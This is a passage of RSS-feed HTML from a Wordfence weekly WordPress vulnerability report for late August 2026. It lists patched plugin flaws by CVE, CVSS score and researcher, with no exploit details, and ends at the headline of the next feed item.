		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1d3eddce-1b41-4a33-8d57-bd594cf06a06" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ab8f2a05-4bc9-4f8d-b5bf-efbbeb5818d6" target="_blank" rel="noopener">Notifima – WooCommerce Stock Manager, Inventory Management, Waitlist &lt; 3.1.4 &#8211; Authenticated (Subscriber+) Insecure Direct Object Reference</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-78139" target="_blank" rel="noopener noreferrer">							CVE-2026-78139						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woocommerce-product-stock-alert" target="_blank" rel="noopener">Notifima – WooCommerce Stock Manager, Inventory Management, Waitlist</a> <span class="wfvr-software-slug">[woocommerce-product-stock-alert]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/shikhali-jamalzade" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/ead6eac6aef4e9f4e2d49ef7f41d9316.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="ead6eac6aef4e9f4e2d49ef7f41d9316"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/shikhali-jamalzade" target="_blank" rel="noopener">Shikhali Jamalzade</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ab8f2a05-4bc9-4f8d-b5bf-efbbeb5818d6" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/0c5e3ca4-fbba-4428-ab3b-e955aa9f60d4" target="_blank" rel="noopener">OwnerRez &lt;= 1.2.6 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-81758" target="_blank" rel="noopener noreferrer">							CVE-2026-81758						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ownerrez" target="_blank" rel="noopener">OwnerRez</a> <span class="wfvr-software-slug">[ownerrez]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/junhee-cho" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/e11f235d878446888d690cc5ba93c3ba.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="e11f235d878446888d690cc5ba93c3ba"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/junhee-cho" target="_blank" rel="noopener">JunHee CHO</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/0c5e3ca4-fbba-4428-ab3b-e955aa9f60d4" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/02e58374-e641-42f6-a718-cd364e38855c" target="_blank" rel="noopener">Project Manager – AI Powered Project Management, Task Management, Kanban Board &amp; Time Tracker &lt; 4.0.7 &#8211; Authenticated (Subscriber+) Insecure Direct Object Reference</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-74929" target="_blank" rel="noopener noreferrer">							CVE-2026-74929						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 26, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wedevs-project-manager" target="_blank" rel="noopener">Project Manager – AI Powered Project Management, Task Management, Kanban Board &amp; Time Tracker</a> <span class="wfvr-software-slug">[wedevs-project-manager]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/pedro-pinho" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/10dc2bd424adaa3236fb2e17dcdba9db.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="10dc2bd424adaa3236fb2e17dcdba9db"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/pedro-pinho" target="_blank" rel="noopener">Pedro Pinho</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/02e58374-e641-42f6-a718-cd364e38855c" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/5b096b49-a7a9-4223-8ec7-beea39e3568d" target="_blank" rel="noopener">Project Manager – AI Powered Project Management, Task Management, Kanban Board &amp; Time Tracker 2.2.0 &#8211; 4.0.6 &#8211; Authenticated (Subscriber+) Insecure Direct Object Reference</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-74930" target="_blank" rel="noopener noreferrer">							CVE-2026-74930						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 26, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wedevs-project-manager" target="_blank" rel="noopener">Project Manager – AI Powered Project Management, Task Management, Kanban Board &amp; Time Tracker</a> <span class="wfvr-software-slug">[wedevs-project-manager]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/usama-arshad" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/2290ce797e74f0d83f941dfac9af5ed1.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="2290ce797e74f0d83f941dfac9af5ed1"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/usama-arshad" target="_blank" rel="noopener">Usama Arshad</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/5b096b49-a7a9-4223-8ec7-beea39e3568d" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b3c13c92-0354-436f-ab41-9d8caddd3f4f" target="_blank" rel="noopener">Push Notification for Post and BuddyPress &lt;= 3.20 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-81279" target="_blank" rel="noopener noreferrer">							CVE-2026-81279						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 26, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/push-notification-for-post-and-buddypress" target="_blank" rel="noopener">Push Notification for Post and BuddyPress</a> <span class="wfvr-software-slug">[push-notification-for-post-and-buddypress]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/junhee-cho" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/e11f235d878446888d690cc5ba93c3ba.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="e11f235d878446888d690cc5ba93c3ba"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/junhee-cho" target="_blank" rel="noopener">JunHee CHO</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b3c13c92-0354-436f-ab41-9d8caddd3f4f" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ecdb7f0e-aacb-4e79-a041-e9e060b61573" target="_blank" rel="noopener">Quiz and Survey Master (QSM) – Quiz Maker &amp; Survey Maker &lt; 11.2.4 &#8211; Authenticated (Contributor+) Insecure Direct Object Reference</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-79615" target="_blank" rel="noopener noreferrer">							CVE-2026-79615						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/quiz-master-next" target="_blank" rel="noopener">Quiz and Survey Master (QSM) – Quiz Maker &amp; Survey Maker</a> <span class="wfvr-software-slug">[quiz-master-next]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/shikhali-jamalzade" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/ead6eac6aef4e9f4e2d49ef7f41d9316.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="ead6eac6aef4e9f4e2d49ef7f41d9316"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/shikhali-jamalzade" target="_blank" rel="noopener">Shikhali Jamalzade</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ecdb7f0e-aacb-4e79-a041-e9e060b61573" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/9671081f-ce7d-4141-be82-104ce08c4382" target="_blank" rel="noopener">SureFeedback Client Site &lt;= 1.2.12 &#8211; Authenticated (Subscriber+) Information Exposure</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-80433" target="_blank" rel="noopener noreferrer">							CVE-2026-80433						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 26, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/projecthuddle-child-site" target="_blank" rel="noopener">SureFeedback Client Site</a> <span class="wfvr-software-slug">[projecthuddle-child-site]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/doyz" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/25a7aba6b0ca3cb44451acfaa9a181fc.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="25a7aba6b0ca3cb44451acfaa9a181fc"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/doyz" target="_blank" rel="noopener">doyz</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/9671081f-ce7d-4141-be82-104ce08c4382" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/946ec633-a271-4e39-9ffe-e5543b063066" target="_blank" rel="noopener">UpdraftPlus: WP Backup &amp; Migration Plugin &lt; 1.26.7 &#8211; Cross-Site Request Forgery</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-76549" target="_blank" rel="noopener noreferrer">							CVE-2026-76549						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/updraftplus" target="_blank" rel="noopener">UpdraftPlus: WP Backup &amp; Migration Plugin</a> <span class="wfvr-software-slug">[updraftplus]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jashid-sany" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/2c141f36c58aa14b55fc2863ae33e5d8.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="2c141f36c58aa14b55fc2863ae33e5d8"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jashid-sany" target="_blank" rel="noopener">Jashid Sany</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/946ec633-a271-4e39-9ffe-e5543b063066" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/6e2f8f97-0f45-4d04-b6ef-77b562d07662" target="_blank" rel="noopener">User Registration &amp; Membership – Free &amp; Paid Memberships, Subscriptions, Content Restriction, User Profile, Custom User Registration &amp; Login Builder &lt; 5.2.5 &#8211; Authenticated (Subscriber+) Insecure Direct Object Reference</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-79995" target="_blank" rel="noopener noreferrer">							CVE-2026-79995						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/user-registration" target="_blank" rel="noopener">User Registration &amp; Membership – Free &amp; Paid Memberships, Subscriptions, Content Restriction, User Profile, Custom User Registration &amp; Login Builder</a> <span class="wfvr-software-slug">[user-registration]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/sai-praneeth-koti" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/da87f3eddb4ac7ac5ccd63ae400c168c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="da87f3eddb4ac7ac5ccd63ae400c168c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/sai-praneeth-koti" target="_blank" rel="noopener">Sai Praneeth Koti</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/6e2f8f97-0f45-4d04-b6ef-77b562d07662" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/83936cda-e868-44f6-be5d-f26086bc4688" target="_blank" rel="noopener">WP Courses LMS &lt;= 3.2.29 &#8211; Insecure Direct Object Reference to Authenticated (Custom+) Sensitive Information Disclosure via &#8216;resultID&#8217; Parameter</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-10630" target="_blank" rel="noopener noreferrer">							CVE-2026-10630						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 24, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-courses" target="_blank" rel="noopener">WP Courses LMS – Online Courses Builder, eLearning Courses, Courses Solution, Education Courses</a> <span class="wfvr-software-slug">[wp-courses]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/vapour" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/cea66da98e20e80db2900b6b074ea702.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="cea66da98e20e80db2900b6b074ea702"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/vapour" target="_blank" rel="noopener">Vapour</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/83936cda-e868-44f6-be5d-f26086bc4688" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/40a1d4d3-a51f-4bf4-9e3c-d09ebe5ce55c" target="_blank" rel="noopener">WP Job Portal – AI-Powered Recruitment System for Company or Job Board website &lt;= 2.5.9 &#8211; Authenticated (Subscriber+) Insecure Direct Object Reference</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-81299" target="_blank" rel="noopener noreferrer">							CVE-2026-81299						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-job-portal" target="_blank" rel="noopener">WP Job Portal – AI-Powered Recruitment System for Company or Job Board website</a> <span class="wfvr-software-slug">[wp-job-portal]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/md-mehedi-hasan" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b14fa5f6450b0009896584807bc88c4c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b14fa5f6450b0009896584807bc88c4c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/md-mehedi-hasan" target="_blank" rel="noopener">Md Mehedi Hasan</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/40a1d4d3-a51f-4bf4-9e3c-d09ebe5ce55c" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-low">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/8036d889-b5c9-46fc-af95-80d28292fdc1" target="_blank" rel="noopener">FluentPlayer Pro &lt;= 1.3.2 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">2.7</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>2.7 (Low)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-81272" target="_blank" rel="noopener noreferrer">							CVE-2026-81272						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 26, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/fluent-player-pro" target="_blank" rel="noopener">Fluent Player Pro</a> <span class="wfvr-software-slug">[fluent-player-pro]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/8036d889-b5c9-46fc-af95-80d28292fdc1" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-low">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/5c3862db-d04b-40e2-8b5e-99cd3153d654" target="_blank" rel="noopener">Rank Math SEO – AI SEO Tools to Dominate SEO Rankings &lt; 1.0.277 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">2.7</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>2.7 (Low)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-77786" target="_blank" rel="noopener noreferrer">							CVE-2026-77786						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 29, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/seo-by-rank-math" target="_blank" rel="noopener">Rank Math SEO – AI SEO Tools to Dominate SEO Rankings</a> <span class="wfvr-software-slug">[seo-by-rank-math]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/mohammed-abd-alrahman" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/6850e6e9fde2fb4afa5c90fd6bb8b6c9.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="6850e6e9fde2fb4afa5c90fd6bb8b6c9"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/mohammed-abd-alrahman" target="_blank" rel="noopener">Mohammed Abd Alrahman</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/5c3862db-d04b-40e2-8b5e-99cd3153d654" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div></div>
<hr>
<p><em>As a reminder, Wordfence has curated an industry leading vulnerability database with all known WordPress core, theme, and plugin vulnerabilities known as Wordfence Intelligence.</em></p>
<p>This database is continuously updated, maintained, and populated by Wordfence’s highly credentialed and experienced vulnerability researchers through in-house vulnerability research, vulnerability researchers submitting directly to us through our <a href="https://www.wordfence.com/threat-intel/bug-bounty-program/" target="_blank" rel="noopener">Bug Bounty Program</a>, and by monitoring varying sources to capture all publicly available WordPress vulnerability information and adding additional context where we can.</p>
<p><a href="https://www.wordfence.com/subscribe-to-the-wordfence-email-list/" target="_blank" rel="noopener">Click here to sign-up for our mailing list</a> to receive weekly vulnerability reports like this and important WordPress Security reports in your inbox the moment they are published.</p>
<p>The post <a href="https://www.wordfence.com/blog/2026/09/wordfence-intelligence-weekly-wordpress-vulnerability-report-august-24-2026-to-august-30-2026/" target="_blank" rel="noopener">Wordfence Intelligence Weekly WordPress Vulnerability Report (August 24, 2026 to August 30, 2026)</a> appeared first on <a href="https://www.wordfence.com/" target="_blank" rel="noopener">Wordfence</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Attackers Actively Exploiting Critical Vulnerability in Super Forms Plugin</title>
		<link>https://swiftupdates.ca/attackers-actively-exploiting-critical-vulnerability-in-super-forms-plugin/</link>
		
